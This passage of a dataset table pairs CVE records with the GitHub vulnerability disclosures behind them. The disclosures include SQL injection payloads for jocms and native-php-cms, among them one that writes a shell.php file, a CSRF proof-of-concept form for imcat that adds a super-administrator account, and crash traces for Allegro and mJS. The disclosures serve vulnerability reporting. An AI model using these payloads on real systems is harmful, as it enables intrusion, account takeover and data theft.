cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164 values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1 value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2021-36431 | 2023-02-03T18:15:09.433 | SQL injection vulnerability in jocms 0.8 allows remote attackers to run arbitrary SQL commands and view sentivie information via jo_json_check() function in jocms/apps/mask/inc/mask.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/mxgbr/jocms/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/mxgbr/jocms/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jocms_project:jocms:0.8:*:*:*:*:*:*:*",
"matchCriteriaId": "02D9279B-1F1B-45DD-9ED8-DF807BF97D4A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/mxgbr/jocms/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"mxgbr",
"jocms"
] | ### 1.SQL Injection vulnerability
In jocms/apps/mask/inc/mask.php line 18~23:
```php
$decoded = jo_json_check();
if($decoded == false){
throw new Exception($JO_LANG['ERR_INP_JSON']);
}
$mask = jo_get_masks($decoded["id"])[0];
```
function `jo_json_check()` will return JSON data submitted by users:
```php
function jo_json_check(){
if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
return false;
}
$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
if(strpos(strtolower($contentType), 'application/json') != 0){
return false;
}
$content = trim(file_get_contents("php://input"));
$decoded = json_decode($content, true);
if(!is_array($decoded)){
return false;
}
return $decoded;
}
```
then `jo_get_masks()` will execute SQL statement.
```php
function jo_get_masks($id){
$condition = "";
$masks = [];
if($id != "all"){
$condition = " WHERE id='".$id."' ";
}else{
$condition = " WHERE type='mask' ";
}
$code;
$handle = jocms_db_link();
$result = $handle->query("SELECT * FROM masks ".$condition." ORDER BY name");
while($output = $result->fetchArray()){
$masks[] = $output;
}
return $masks;
}
```
There is no filtering for the input parameter,so we can use single quotation marks to close and inject.payload:
{"id":"1'union select 1,'hacked',3,sqlite_version(),5--"}
<img width="1259" alt="iShot2021-06-23 22 17 29" src="https://user-images.githubusercontent.com/37724890/123113074-d59a0a80-d470-11eb-9585-a561f40788cb.png">
### 2.SQL Injection vulnerability
In jocms/apps/mask/inc/getmask.php line 16~21
```php
$decoded = jo_json_check();
if($decoded == false){
throw new Exception($JO_LANG['ERR_INP_JSON']);
}
$masks = jo_get_masks($decoded["content"]);
```
It's similar to the one above. Just change the `id` to `content`.payload:
{"content":"1'union select 1,'hacked',3,sqlite_version(),5--"}
<img width="1288" alt="iShot2021-06-23 22 23 41" src="https://user-images.githubusercontent.com/37724890/123114152-b0f26280-d471-11eb-8f58-b688edf326fb.png">
### 3.SQL Injection vulnerability
In jocms/apps/mask/mask.php line 19~30
```php
if(isset($_POST["saved"])){
if(isset($_POST["id"]) AND isset($_POST["name"]) AND isset($_POST["code"])){
$code = $_POST["code"];
$code = str_replace(array("\r\n", chr(10).chr(13), "\r", "\n", PHP_EOL, chr(10), chr(13)),'--jo:r--', $code);
$domobject = str_get_html ($code);
$attr = "data-jo-content";
$mask = $domobject->find("*", 0);
$mask->$attr = "noneditable";
$code = str_replace("--jo:r--", PHP_EOL, $domobject->save());
jo_set_mask($_POST["id"], $_POST["name"], "mask", $code);
}
}
```
user controlled parameters will pass into the function jo_set_mask().
In jocms/core/inc/db.php line 253:
```php
function jo_set_mask($id, $name, $type, $code){
$handle = jocms_db_link();
if($id != 0){
$return = $handle->exec("UPDATE masks SET name='".$name."', code='".$code."' WHERE id='".$id."'");
$return = $id;
}else{
$return = $handle->exec("INSERT INTO masks(name,type,code) VALUES ('".$handle->escapeString($name)."','".$handle->escapeString($type)."','".$handle->escapeString($code)."')");
$return = $handle->lastInsertRowid();
}
return $return;
}
```
No filtering for parameters so we can execute any SQL statement.
we can write a php code by this:
saved=a&id=1';ATTACH DATABASE 'shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo()?>');&name=xxxxxxx&code=xxxxxxxx
<img width="1186" alt="iShot2021-06-23 22 36 08" src="https://user-images.githubusercontent.com/37724890/123116405-77baf200-d473-11eb-9f0f-1a4e81128192.png">
visit:
<img width="905" alt="iShot2021-06-23 22 35 52" src="https://user-images.githubusercontent.com/37724890/123116408-78538880-d473-11eb-968d-d03fb82f0844.png">
### 4.SQL Injection vulnerability
In jocms/apps/mask/mask.php line 31~33:
```php
if(isset($_GET["deleted"]) AND isset($_GET["id"])){
jo_delete_mask($_GET["id"]);
}
```
follow function jo_delete_mask():
```php
function jo_delete_mask($id){
$handle = jocms_db_link();
$result = $handle->query("DELETE FROM masks WHERE id='".$id."'");
return $result;
}
```
No filtering for parameter id,so we can inject,use time based injection:
?deleted=x&id=0'or+case+when(1=2)+then(randomblob(1000000000))else(0)end+or+'
<img width="1309" alt="iShot2021-06-23 23 16 55" src="https://user-images.githubusercontent.com/37724890/123123324-54934100-d479-11eb-83eb-8717ec7e7b4f.png">
<img width="1310" alt="iShot2021-06-23 23 17 13" src="https://user-images.githubusercontent.com/37724890/123123331-55c46e00-d479-11eb-8c66-62862033f0c6.png">
| jocms v0.8 has some SQL Injection vulnerability | https://api.github.com/repos/mxgbr/jocms/issues/6/comments | 0 | 2021-06-23T15:21:42Z | 2023-02-08T08:35:54Z | https://github.com/mxgbr/jocms/issues/6 | 928,378,812 | 6 | 4,687 |
CVE-2021-36443 | 2023-02-03T18:15:09.767 | Cross Site Request Forgery vulnerability in imcat 5.4 allows remote attackers to escalate privilege via lack of token verification. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/peacexie/imcat/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/peacexie/imcat/issues/9"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:txjia:imcat:5.4:*:*:*:*:*:*:*",
"matchCriteriaId": "9D220737-B5D4-4768-A623-D185E1CE2690",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/peacexie/imcat/issues/9 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"peacexie",
"imcat"
] | ### 1. Overview
Official website: http://txjia.com/imcat/
Version: imcat-5.4
Vulnerability type: CSRF post
Source code: https://github.com/peacexie/imcat/releases/tag/v5.4
Harm: Super administrator account can be added
### 2. Analysis
2.1 logic analysis
In the add administrator page, the security of data source is not verified by token and referer

(1) There is no token used for security verification in the data packet, so there is the possibility of forgery
POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 539
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&recbk=ref
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder_Path=Files%3A%2F%3A1; v49_sessid_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49_Uniqueid_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm_lpvt_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49_ocar_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9
Upgrade-Insecure-Requests: 1
recbk=http%3A%2F%2F127.0.0.1%2Fimcat%2Froot%2Frun%2Fadm.php%3Fdops-a%26mod%3Dadminer&fm%5Buid%5D=2021-6p-j6xk&fm%5Buno%5D=1&fm%5Buname%5D=qwe_123&fm%5Bupass%5D=adm_123&fm%5Bgrade%5D=supper&fm%5Bshow%5D=1&fm%5Bmname%5D=qwe_123&fm%5Bindep%5D=inadm&fm%5Bmiuid%5D=&fm%5Bmtel%5D=12345678091&fm%5Bmemail%5D=23wqw%4022.com&fm%5Bmaddr%5D=&fm%5Batime%5D=2021-06-21+17%3A14%3A49&fm%5Betime%5D=2021-06-21+17%3A14%3A49&fm%5Bauser%5D=adm_123&fm%5Beuser%5D=adm_123&fm%5Baip%5D=127.0.0.1&fm%5Beip%5D=127.0.0.1&bsend=%E6%8F%90%E4%BA%A4&mod=adminer&isadd=1
(2) After deleting the referer: information, you can still add an administrator

### 3. Loophole recurrence
(1) Environment preparation, building environment with phpstudy

(2) Construct a payload with the function of creating a super administrator account, qwe_ 123/adm_ one hundred and twenty-three
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&" method="POST">
<input type="hidden" name="recbk" value="http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer" />
<input type="hidden" name="fm[uid]" value="2021-6p-j6xk" />
<input type="hidden" name="fm[uno]" value="1" />
<input type="hidden" name="fm[uname]" value="qwe_123" />
<input type="hidden" name="fm[upass]" value="adm_123" />
<input type="hidden" name="fm[grade]" value="supper" />
<input type="hidden" name="fm[show]" value="1" />
<input type="hidden" name="fm[mname]" value="qwe_123" />
<input type="hidden" name="fm[indep]" value="inadm" />
<input type="hidden" name="fm[miuid]" value="" />
<input type="hidden" name="fm[mtel]" value="12345678091" />
<input type="hidden" name="fm[memail]" value="23wqw@22.com" />
<input type="hidden" name="fm[maddr]" value="" />
<input type="hidden" name="fm[atime]" value="2021-06-21 17:14:49" />
<input type="hidden" name="fm[etime]" value="2021-06-21 17:14:49" />
<input type="hidden" name="fm[auser]" value="adm_123" />
<input type="hidden" name="fm[euser]" value="adm_123" />
<input type="hidden" name="fm[aip]" value="127.0.0.1" />
<input type="hidden" name="fm[eip]" value="127.0.0.1" />
<input type="hidden" name="bsend" value="��¤" />
<input type="hidden" name="mod" value="adminer" />
<input type="hidden" name="isadd" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
(3) Through a variety of fishing means to lure the administrator to click on the page, that is, to complete the action of adding super administrator without the administrator's knowledge



### 4. Verification of attack results
Using qwe_ 123/adm_ 123 login in the background

### 5. Means of Defense
Add a token to the place where important actions are performed for authentication. The value of the token must be random and unpredictable | CSRF vulnerability in imcat v5.4 | https://api.github.com/repos/peacexie/imcat/issues/9/comments | 7 | 2021-06-24T03:47:10Z | 2021-07-04T08:08:53Z | https://github.com/peacexie/imcat/issues/9 | 928,818,710 | 9 | 4,688 |
CVE-2021-36489 | 2023-02-03T18:15:10.140 | Buffer Overflow vulnerability in Allegro through 5.2.6 allows attackers to cause a denial of service via crafted PCX/TGA/BMP files to allegro_image addon. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liballeg/allegro5/issues/1251"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liballeg/allegro5/issues/1251"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:liballeg:allegro:*:*:*:*:*:*:*:*",
"matchCriteriaId": "47CF9599-635A-4FA3-A3CF-6DBB6D12F55F",
"versionEndExcluding": null,
"versionEndIncluding": "5.2.6",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/liballeg/allegro5/issues/1251 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liballeg",
"allegro5"
] | Hi ,
I found an error while learning the exmple example.
system info:
ubuntu 20.02 TLS
clang 11
comit:03ab10df438860c7c17cf427e3282027d913d93f
```bash
$ ./ex_bitmap crash
```
[crash.zip](https://github.com/liballeg/allegro5/files/6615102/crash.zip)
gdb info
```bash
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0xff82ff82ff82ff82
RBX: 0x0
RCX: 0x15d5
RDX: 0x1
RSI: 0x7fffffffdc7f --> 0x10ff
RDI: 0x61de50 --> 0xff82ff82ff82ff82
RBP: 0x61ddf0 --> 0xff82ff8200000000
RSP: 0x7fffffffdc70 --> 0x61f8b0 --> 0x0
RIP: 0x7ffff7e70fda (<al_fgetc+170>: call QWORD PTR [rax+0x10])
R8 : 0x7d ('}')
R9 : 0x61ddf0 --> 0xff82ff8200000000
R10: 0x0
R11: 0x7ffff766cbe0 --> 0x620270 --> 0x0
R12: 0x61de50 --> 0xff82ff82ff82ff82
R13: 0x40a180 --> 0x40a210 --> 0x100000102000100
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff7e70fd0 <al_fgetc+160>: mov edx,0x1
0x7ffff7e70fd5 <al_fgetc+165>: xor ebx,ebx
0x7ffff7e70fd7 <al_fgetc+167>: mov rax,QWORD PTR [rdi]
=> 0x7ffff7e70fda <al_fgetc+170>: call QWORD PTR [rax+0x10]
0x7ffff7e70fdd <al_fgetc+173>: add rax,rbx
0x7ffff7e70fe0 <al_fgetc+176>: cmp rax,0x1
0x7ffff7e70fe4 <al_fgetc+180>: movzx ecx,BYTE PTR [rsp+0xf]
0x7ffff7e70fe9 <al_fgetc+185>: mov eax,0xffffffff
Guessed arguments:
arg[0]: 0x61de50 --> 0xff82ff82ff82ff82
arg[1]: 0x7fffffffdc7f --> 0x10ff
arg[2]: 0x1
arg[3]: 0x15d5
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdc70 --> 0x61f8b0 --> 0x0
0008| 0x7fffffffdc78 --> 0xff82000000000002
0016| 0x7fffffffdc80 --> 0x10
0024| 0x7fffffffdc88 --> 0x7ffff7fb98e8 (<_al_load_tga_f+3784>: mov ebx,eax)
0032| 0x7fffffffdc90 --> 0x7fff00100958
0040| 0x7fffffffdc98 --> 0x61ddf0 --> 0xff82ff8200000000
0048| 0x7fffffffdca0 --> 0xf0040a180
0056| 0x7fffffffdca8 --> 0x10
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffff7e70fda in al_fread (f=0x61de50, ptr=0x7fffffffdc7f, size=<optimized out>) at /home/hh/Downloads/allegro5/src/file.c:116
116 return bytes_ungetc + f->vtable->fi_fread(f, cptr, size);
```
```bash
#0 0x00007ffff7e70fda in al_fread (f=0x61de50, ptr=0x7fffffffdc7f, size=<optimized out>) at /home/hh/Downloads/allegro5/src/file.c:116
#1 al_fgetc (f=f@entry=0x61de50) at /home/hh/Downloads/allegro5/src/file.c:229
#2 0x00007ffff7fb98e8 in rle_tga_read16 (b=0x61ddf0, w=<optimized out>, f=<optimized out>) at /home/hh/Downloads/allegro5/addons/image/tga.c:212
#3 _al_load_tga_f (f=f@entry=0x61de50, flags=flags@entry=0x0) at /home/hh/Downloads/allegro5/addons/image/tga.c:467
#4 0x00007ffff7fba51f in _al_load_tga (filename=0x7fffffffe595 "crash",
flags=0x0) at /home/hh/Downloads/allegro5/addons/image/tga.c:565
#5 0x00007ffff7e22753 in al_load_bitmap_flags (
filename=filename@entry=0x7fffffffe595 "crash", flags=0xffffdc7f)
at /home/hh/Downloads/allegro5/src/bitmap_io.c:207
#6 0x00007ffff7e22622 in al_load_bitmap (
filename=filename@entry=0x7fffffffe595 "crash")
at /home/hh/Downloads/allegro5/src/bitmap_io.c:184
#7 0x0000000000403688 in main (argc=argc@entry=0x2, argv=argv@entry=0x7fffffffe2d8) at /home/hh/Downloads/allegro5/examples/ex_bitmap.c:77
#8 0x00007ffff74a80b3 in __libc_start_main (main=0x4035a0 <main>, argc=0x2, argv=0x7fffffffe2d8, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe2c8) at ../csu/libc-start.c:308
#9 0x00000000004032fe in _start ()
``` | segmentation fault to al_load_bitmap | https://api.github.com/repos/liballeg/allegro5/issues/1251/comments | 10 | 2021-06-08T09:09:41Z | 2021-06-27T23:52:43Z | https://github.com/liballeg/allegro5/issues/1251 | 914,646,406 | 1,251 | 4,689 |
CVE-2021-36503 | 2023-02-03T18:15:10.393 | SQL injection vulnerability in native-php-cms 1.0 allows remote attackers to run arbitrary SQL commands via the cat parameter to /list.php file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:native-php-cms_project:native-php-cms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E4B76547-B907-477E-9620-0BEA1457E2A6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Fanli2012/native-php-cms/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Fanli2012",
"native-php-cms"
] | Code Adress:/list.php
Type:SQL injection error-based
Parameter:cat
Code:

exploit:
http://debug1.com//list.php?cat=1 and 1=1
http://debug1.com//list.php?cat=1 and 1=2

https://127.0.0.1/list.php?cat=1 AND GTID_SUBSET(CONCAT(0x7176707071,(SELECT (ELT(2051=2051,1))),0x716b7a7171),2051)
Repair suggestion: intercept the SQL injection request that adds the get post parameter to the program, or escape or preprocess the program SQL
| There is a vulnerability in your project - SQL injection | https://api.github.com/repos/Fanli2012/native-php-cms/issues/3/comments | 0 | 2021-06-28T15:02:37Z | 2021-06-28T15:02:37Z | https://github.com/Fanli2012/native-php-cms/issues/3 | 931,668,909 | 3 | 4,690 |
CVE-2021-36535 | 2023-02-03T18:15:10.653 | Buffer Overflow vulnerability in Cesanta mJS 1.26 allows remote attackers to cause a denial of service via crafted .js file to mjs_set_errorf. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/175"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/175"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:1.26:*:*:*:*:*:*:*",
"matchCriteriaId": "25C97820-C80A-41CE-B510-F292D2AF665E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mjs/issues/175 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ### Built:
Jun 30 2021
### Details:
heap-based buffer overflow **mjs.c:7617** in **mjs_set_errorf**
### Command:
./mjs -f Heap_Buffer_Overflow.js
### Result:
==2419050==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000178 at pc 0x55555557f3ed bp 0x7fffffffcf40 sp 0x7fffffffcf30
READ of size 8 at 0x604000000178 thread T0
#0 0x55555557f3ec in mjs_set_errorf /home/constantine/mjs/mjs.c:7617
#1 0x555555598395 in parse_literal /home/constantine/mjs/mjs.c:12166
#2 0x55555559861b in parse_call_dot_mem /home/constantine/mjs/mjs.c:12175
#3 0x5555555990d3 in parse_postfix /home/constantine/mjs/mjs.c:12209
#4 0x55555559932c in parse_unary /home/constantine/mjs/mjs.c:12228
#5 0x5555555995d1 in parse_mul_div_rem /home/constantine/mjs/mjs.c:12241
#6 0x555555599ba8 in parse_plus_minus /home/constantine/mjs/mjs.c:12246
#7 0x55555559a1c1 in parse_shifts /home/constantine/mjs/mjs.c:12251
#8 0x55555559a648 in parse_comparison /home/constantine/mjs/mjs.c:12255
#9 0x55555559a9bb in parse_equality /home/constantine/mjs/mjs.c:12259
#10 0x55555559ae46 in parse_bitwise_and /home/constantine/mjs/mjs.c:12264
#11 0x55555559b3ec in parse_bitwise_xor /home/constantine/mjs/mjs.c:12269
#12 0x55555559b992 in parse_bitwise_or /home/constantine/mjs/mjs.c:12274
#13 0x55555559bf38 in parse_logical_and /home/constantine/mjs/mjs.c:12279
#14 0x55555559c4de in parse_logical_or /home/constantine/mjs/mjs.c:12284
#15 0x7fffffffdc0f ([stack]+0x1fc0f)
Address 0x604000000178 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/constantine/mjs/mjs.c:7617 in mjs_set_errorf
Shadow bytes around the buggy address:
0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff8000: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
0x0c087fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2419050==ABORTING
### PoC:
[Heap_Buffer_Overflow.js.tar.gz](https://github.com/cesanta/mjs/files/6738729/Heap_Buffer_Overflow.js.tar.gz)
| Heap-based Buffer Overflow Vulnerability | https://api.github.com/repos/cesanta/mjs/issues/175/comments | 4 | 2021-06-30T07:10:17Z | 2021-07-27T07:17:09Z | https://github.com/cesanta/mjs/issues/175 | 933,378,748 | 175 | 4,691 |
CVE-2021-36546 | 2023-02-03T18:15:11.163 | Incorrect Access Control issue discovered in KiteCMS 1.1 allows remote attackers to view sensitive information via path in application URL. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Kitesky/KiteCMS/issues/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Kitesky/KiteCMS/issues/10"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kitesky:kitecms:1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "206854A6-CDE7-4607-B768-79570E16AE42",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"922"
